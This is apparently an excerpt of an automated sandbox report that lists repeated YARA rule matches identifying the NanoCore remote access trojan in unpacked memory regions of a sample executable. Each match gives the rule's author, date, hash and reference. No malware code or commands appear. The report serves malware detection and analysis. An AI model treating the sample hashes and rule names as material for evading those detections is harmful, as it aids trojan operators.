Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.76d0000.15.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.473702f.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.473702f.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.76d0000.15.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.76d0000.15.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.473702f.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.78f0000.24.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.78f0000.24.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.78f0000.24.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.5ab0000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.5ab0000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.5ab0000.11.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.5cd4629.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.5cd4629.12.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.5cd4629.12.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.78f0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.78f0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.78f0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 12.2.nD2ozRD7MN.exe.3c7b7e6.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 12.2.nD2ozRD7MN.exe.3c7b7e6.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.nD2ozRD7MN.exe.3c7b7e6.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.nD2ozRD7MN.exe.3c7b7e6.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.7860000.18.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.7860000.18.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.7860000.18.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.7900000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.7900000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.7900000.27.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.790e8a4.26.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.7890000.21.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.790e8a4.26.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.790e8a4.26.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.7890000.21.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.7890000.21.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.76e0000.16.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.76e0000.16.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.76e0000.16.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 9.2.nD2ozRD7MN.exe.41295d0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 9.2.nD2ozRD7MN.exe.41295d0.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.nD2ozRD7MN.exe.41295d0.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.nD2ozRD7MN.exe.41295d0.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.nD2ozRD7MN.exe.41295d0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.45e4e38.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.45e4e38.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.45e4e38.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 9.2.nD2ozRD7MN.exe.41295d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 9.2.nD2ozRD7MN.exe.41295d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.nD2ozRD7MN.exe.41295d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.nD2ozRD7MN.exe.41295d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.nD2ozRD7MN.exe.41295d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.473fe5e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.3456430.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.3435bc4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.3435bc4.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.nD2ozRD7MN.exe.3435bc4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.3435bc4.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.33dd044.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.33dd044.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.33dd044.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.473fe5e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.3456430.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.nD2ozRD7MN.exe.3456430.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.3456430.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
